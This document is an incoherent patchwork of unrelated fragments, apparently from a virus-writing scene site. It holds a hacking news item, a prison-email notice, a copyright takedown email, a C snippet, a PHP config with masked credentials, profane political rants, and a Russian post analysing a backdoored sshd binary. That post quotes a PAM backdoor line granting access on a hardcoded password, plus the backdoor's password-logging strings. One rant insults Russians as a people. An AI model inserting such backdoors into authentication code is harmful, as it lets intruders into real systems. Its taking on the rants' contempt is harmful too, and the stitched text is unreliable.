Русские хакеры объявили кибер войну Украине
Русские хакеры организовали "RCW" (Russian Cyber Warrior) для борьбы с не легитимной властью Петра Порошенко. ( большеада )

From: Dmytro ... <dmytro...@rbc.ua>
Subject: Re: Fwd: Русские хакеры объявили кибер войну Украине

Спасибо, таки да, это бы взлом. Новость убрали. Ведем работы по устранению уязвимостей...

This is a system generated message informing you that the above-named person is a federal prisoner who seeks to add you to his/her contact list for exchanging electronic messages. There is no message from the prisoner at this time.

You can ACCEPT this prisoner's request or BLOCK this individual or all federal prisoners from contacting you via electronic messaging at www.corrlinks.com. To register with CorrLinks you must enter the email address that received this notice along with the identification code below.

Email Address: ...

Identification Code: ...

This identification code will expire in 10 days.

By approving electronic correspondence with federal prisoners, you consent to have the Bureau of Prisons staff monitor the content of all electronic messages exchanged.

Once you have registered with CorrLinks and approved the prisoner for correspondence, the prisoner will be notified electronically.

For additional information related to this program, please visit the http://www.bop.gov/inmate_programs/trulincs_faq.jsp FAQ page.

[

Current Mood

|

apathetic

]

---------- Forwarded message ----------
From: David Gerrold <dgerrold@gmail.com>
Date: 2014-02-04 22:05
Subject: copyright violation
To: dahmer@vxheaven.org

Dear sir,

You have posted on your website the complete text of my novel, WHEN HARLIE WAS ONE.

This novel is currently under copyright and licensed solely to Benbella Books.

I request/demand that you take down that page and any other books or stories that I hold the copyright to.

I will assume that this was done in error and will appreciate your immediate compliance.

Thank you in advance,

David Gerrold

struct foobar {
	unsigned	a;
	void		*b;
	off_t		c;
	struct nested {
#ifdef	FUCKUP_OFFSETS
		int	a;
#endif
		int	b;
	} d;
#ifdef	KILL_WITH_FIRE
	unsgned		e:1;
	unsigned	f:1;
#endif
	unsigned	important_flag:1;
	/* ... tons of shit ... */
	int		important_field;

Ублюдочные идиоты из россиянского госнаркокартеля и роскомцензуры с упоением банят ip-шки CDN CloudFlare. За компанию с торговцами курительными смесями в реестр попал и vx. И знаете - это очень хорошо! Если бы я управлял сайтом, то забанил бы на хуй рашку полностью, потому что Россия - рассадник мерзости, мракобесия и кретинизма. Есть и хорошие, но вы мои милые, не обижайтесь, просто большая часть ваших сограждан сладострастно надрачивает на фантазии о том, как депутат Пиздулина вместе со всей тошнотворной вертикалью замотает их в колючую проволоку и будет ебать шваброй. А нам без любителей plyotka и vodka будет только спокойнее.

А то с этой демократией только срать на головы друг другу научились. Если начинаешь ДЕЛАТЬ-тебя все в гамно мокают, ссылаясь на призрачные международные и демократические законы. Не хочу демократию, хочу РЕЖИМ-ЖЕСТКИЙ,СИЛЬНЫЙ,ЗАКОННЫЙ. Только так будет уверенность в завтрашнем дне. И по теме: все нормально с законом. Если с нас начнется его выполнение, это будет первым шагом к наведению порядка во всем. Если не мы сами, то КТО?????

<?php

/**
 * DB parameters
 */
if( 'ksset.mydinamit.com' == substr($_SERVER[HTTP_HOST], -19) )
{
    define( 'raKSCFG__DB_USERNAME',                 '*****' );
    define( 'raKSCFG__DB_PASSWORD',                 '*****' );
}
else
{
    putenv( 'ORACLE_HOME=/usr/local/oracle/instantclient_11_1' );
    putenv( 'NLS_LANG=AMERICAN_AMERICA.CL8MSWIN1251' );
    putenv( 'TNS_ADMIN=/usr/local/oracle/instantclient_11_1' );
.....

Переживаю из-за того, что под юниксами так и не появилась культура работы с бинарями, лошадки в мире open-source поставляются в исходниках (и зачастую открытых^*, я уже писал про Темную Пиявку aka DarkLeech), на этот раз мне подкинули пару бинарей sshd на посмотреть. Один из них оказался резервной копией оригинала. Второй пропатченный. Спалили его по rpm -V.

Я тоже не люблю спросонья в бинарях копаться. Взял strings.

      pax vobiscum
      /tmp/mc.tmp
      Sshd password detected: %s:%s

На колупание бэкдора ушло 10 минут. До дизассемблера не дошло. А я-то думал отложить на утро, и предвидел чудеса кодерской мысли и тайны ондеграунда. :-) С pam_unix.so - та же беда, вот уже несколько лет школоло таскает один и тот же one liner ("if (strcmp(p,"secpass")==0 ){retval = PAM_SUCCESS;}"), zero-day, блять, сцыкьюрити, оборачивая его не менее "илитными" скриптами на sh. Мир вам, тупые дети! Неужели, так трудно написать нормальную лошадку, так чтобы не тащить в систему 100500 девелоперского стаффа и прочего говна? Тем более, что все уже давно написано. Подсказки давать не буду, кому нужно - сам найдет.

(* у этого подхода есть и достоинства - антивирус бесполезен, чуть менее, чем полностью. Впрочем, антивирус бесполезен в любом случае. Недостатков вагон.)